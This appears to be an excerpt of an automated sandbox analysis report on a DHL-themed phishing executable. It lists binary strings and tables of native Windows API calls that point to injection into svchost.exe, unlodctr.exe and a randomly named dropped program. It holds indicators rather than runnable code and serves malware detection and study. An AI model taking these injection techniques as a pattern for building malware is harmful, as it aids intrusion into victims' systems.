Source: DHL DOCS 2-0106-25.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_6509b23d-6

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0043C713 NtClose,	1_2_0043C713
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072B60 NtClose,LdrInitializeThunk,	1_2_03072B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03072DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_03072C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030735C0 NtCreateMutant,LdrInitializeThunk,	1_2_030735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03074340 NtSetContextThread,	1_2_03074340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03074650 NtSuspendThread,	1_2_03074650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072B80 NtQueryInformationFile,	1_2_03072B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072BA0 NtEnumerateValueKey,	1_2_03072BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072BE0 NtQueryValueKey,	1_2_03072BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072BF0 NtAllocateVirtualMemory,	1_2_03072BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072AB0 NtWaitForSingleObject,	1_2_03072AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072AD0 NtReadFile,	1_2_03072AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072AF0 NtWriteFile,	1_2_03072AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072F30 NtCreateSection,	1_2_03072F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072F60 NtCreateProcessEx,	1_2_03072F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072F90 NtProtectVirtualMemory,	1_2_03072F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072FA0 NtQuerySection,	1_2_03072FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072FB0 NtResumeThread,	1_2_03072FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072FE0 NtCreateFile,	1_2_03072FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072E30 NtWriteVirtualMemory,	1_2_03072E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072E80 NtReadVirtualMemory,	1_2_03072E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072EA0 NtAdjustPrivilegesToken,	1_2_03072EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072EE0 NtQueueApcThread,	1_2_03072EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072D00 NtSetInformationFile,	1_2_03072D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072D10 NtMapViewOfSection,	1_2_03072D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072D30 NtUnmapViewOfSection,	1_2_03072D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072DB0 NtEnumerateKey,	1_2_03072DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072DD0 NtDelayExecution,	1_2_03072DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072C00 NtQueryInformationProcess,	1_2_03072C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072C60 NtCreateKey,	1_2_03072C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072CA0 NtQueryInformationToken,	1_2_03072CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072CC0 NtQueryVirtualMemory,	1_2_03072CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03072CF0 NtOpenProcess,	1_2_03072CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03073010 NtOpenDirectoryObject,	1_2_03073010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03073090 NtSetValueKey,	1_2_03073090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030739B0 NtGetContextThread,	1_2_030739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03073D10 NtOpenProcessToken,	1_2_03073D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03073D70 NtOpenThread,	1_2_03073D70
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E4340 NtSetContextThread,LdrInitializeThunk,	4_2_039E4340
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E4650 NtSuspendThread,LdrInitializeThunk,	4_2_039E4650
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2BA0 NtEnumerateValueKey,LdrInitializeThunk,	4_2_039E2BA0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_039E2BF0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2BE0 NtQueryValueKey,LdrInitializeThunk,	4_2_039E2BE0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2B60 NtClose,LdrInitializeThunk,	4_2_039E2B60
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2AD0 NtReadFile,LdrInitializeThunk,	4_2_039E2AD0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2AF0 NtWriteFile,LdrInitializeThunk,	4_2_039E2AF0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2FB0 NtResumeThread,LdrInitializeThunk,	4_2_039E2FB0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2FE0 NtCreateFile,LdrInitializeThunk,	4_2_039E2FE0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2F30 NtCreateSection,LdrInitializeThunk,	4_2_039E2F30
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_039E2E80
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2EE0 NtQueueApcThread,LdrInitializeThunk,	4_2_039E2EE0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2DD0 NtDelayExecution,LdrInitializeThunk,	4_2_039E2DD0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_039E2DF0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_039E2D10
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_039E2D30
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_039E2CA0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_039E2C70
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2C60 NtCreateKey,LdrInitializeThunk,	4_2_039E2C60
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E35C0 NtCreateMutant,LdrInitializeThunk,	4_2_039E35C0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E39B0 NtGetContextThread,LdrInitializeThunk,	4_2_039E39B0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2B80 NtQueryInformationFile,	4_2_039E2B80
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2AB0 NtWaitForSingleObject,	4_2_039E2AB0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2F90 NtProtectVirtualMemory,	4_2_039E2F90
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2FA0 NtQuerySection,	4_2_039E2FA0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2F60 NtCreateProcessEx,	4_2_039E2F60
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2EA0 NtAdjustPrivilegesToken,	4_2_039E2EA0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2E30 NtWriteVirtualMemory,	4_2_039E2E30
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2DB0 NtEnumerateKey,	4_2_039E2DB0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2D00 NtSetInformationFile,	4_2_039E2D00
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2CC0 NtQueryVirtualMemory,	4_2_039E2CC0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2CF0 NtOpenProcess,	4_2_039E2CF0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E2C00 NtQueryInformationProcess,	4_2_039E2C00
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E3090 NtSetValueKey,	4_2_039E3090
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E3010 NtOpenDirectoryObject,	4_2_039E3010
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E3D10 NtOpenProcessToken,	4_2_039E3D10
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_039E3D70 NtOpenThread,	4_2_039E3D70
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02FA9260 NtReadFile,	4_2_02FA9260
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02FA93F0 NtClose,	4_2_02FA93F0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02FA9350 NtDeleteFile,	4_2_02FA9350
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02FA90F0 NtCreateFile,	4_2_02FA90F0
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_02FA9550 NtAllocateVirtualMemory,	4_2_02FA9550
Source: C:\Windows\SysWOW64\unlodctr.exe	Code function: 4_2_037BF232 NtQueryInformationProcess,	4_2_037BF232

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_0021D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0021D5EB

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_00211201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00211201

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe

Code function: 0_2_0021E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0021E8F6

Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_00222046	0_2_00222046
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001B8060	0_2_001B8060
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_00218298	0_2_00218298
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001EE4FF	0_2_001EE4FF
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001E676B	0_2_001E676B
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_00244873	0_2_00244873
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001DCAA0	0_2_001DCAA0
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001BCAF0	0_2_001BCAF0
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001CCC39	0_2_001CCC39
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001E6DD9	0_2_001E6DD9
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001CB119	0_2_001CB119
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001B91C0	0_2_001B91C0
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001D1394	0_2_001D1394
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001D1706	0_2_001D1706
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001D781B	0_2_001D781B
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001B7920	0_2_001B7920
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001C997D	0_2_001C997D
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001D19B0	0_2_001D19B0
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001D7A4A	0_2_001D7A4A
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001D1C77	0_2_001D1C77
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001D7CA7	0_2_001D7CA7
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_0023BE44	0_2_0023BE44
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001E9EEE	0_2_001E9EEE
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001D1F32	0_2_001D1F32
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_001BBF40	0_2_001BBF40
Source: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe	Code function: 0_2_0118AF28	0_2_0118AF28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004287E3	1_2_004287E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00420023	1_2_00420023
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00413080	1_2_00413080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004269EE	1_2_004269EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004269F3	1_2_004269F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041299F	1_2_0041299F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004129A0	1_2_004129A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00420243	1_2_00420243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041E253	1_2_0041E253
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041E397	1_2_0041E397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041E3A3	1_2_0041E3A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00411440	1_2_00411440
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004144D5	1_2_004144D5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0043ECE3	1_2_0043ECE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004125EA	1_2_004125EA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004125F0	1_2_004125F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00414698	1_2_00414698
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00414716	1_2_00414716
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FA352	1_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E3F0	1_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031003E6	1_2_031003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C02C0	1_2_030C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030100	1_2_03030100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DA118	1_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C8158	1_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F41A2	1_2_030F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031001AA	1_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F81CC	1_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D2000	1_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03064750	1_2_03064750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040770	1_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303C7C0	1_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305C6E0	1_2_0305C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040535	1_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03100591	1_2_03100591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E4420	1_2_030E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F2446	1_2_030F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EE4F6	1_2_030EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FAB40	1_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F6BD7	1_2_030F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303EA80	1_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03056962	1_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030429A0	1_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310A9A6	1_2_0310A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304A840	1_2_0304A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03042840	1_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030268B8	1_2_030268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E8F0	1_2_0306E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03082F28	1_2_03082F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03060F30	1_2_03060F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E2F30	1_2_030E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B4F40	1_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030BEFA0	1_2_030BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03032FC8	1_2_03032FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FEE26	1_2_030FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040E59	1_2_03040E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03052E90	1_2_03052E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FCE93	1_2_030FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FEEDB	1_2_030FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304AD00	1_2_0304AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DCD1F	1_2_030DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03058DBF	1_2_03058DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303ADE0	1_2_0303ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03040C00	1_2_03040C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0CB5	1_2_030E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03030CF2	1_2_03030CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F132D	1_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302D34C	1_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0308739A	1_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030452A0	1_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305B2C0	1_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E12ED	1_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305D2F0	1_2_0305D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0307516C	1_2_0307516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302F172	1_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310B16B	1_2_0310B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304B1B0	1_2_0304B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EF0CC	1_2_030EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030470C0	1_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F70E9	1_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FF0E0	1_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FF7B0	1_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03085630	1_2_03085630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F16CC	1_2_030F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F7571	1_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DD5B0	1_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031095C3	1_2_031095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FF43F	1_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03031460	1_2_03031460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFB76	1_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305FB80	1_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B5BF0	1_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0307DBF9	1_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFA49	1_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F7A46	1_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B3A6C	1_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DDAAC	1_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03085AA0	1_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E1AA3	1_2_030E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EDAC6	1_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D5910	1_2_030D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03049950	1_2_03049950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305B950	1_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030AD800	1_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030438E0	1_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFF09	1_2_030FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03041F92	1_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFFB1	1_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03003FD2	1_2_03003FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03003FD5	1_2_03003FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03049EB0	1_2_03049EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03043D40	1_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F1D5A	1_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030F7D73	1_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305FDC0	1_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B9C32	1_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FFCF2	1_2_030FFCF2
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042E090A	3_2_042E090A
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042D6DA7	3_2_042D6DA7
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042D6E25	3_2_042D6E25
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042EAEF2	3_2_042EAEF2
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042E2732	3_2_042E2732
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042E90FD	3_2_042E90FD
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042E9102	3_2_042E9102
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042E0962	3_2_042E0962
Source: C:\Program Files (x86)\BDSxgArvbsTlxtuJqGeUsrGFgpjfrJAAsRUsOHIejxEVKA\MSNzUrVSel.exe	Code function: 3_2_042E2952	3_2_042E2952
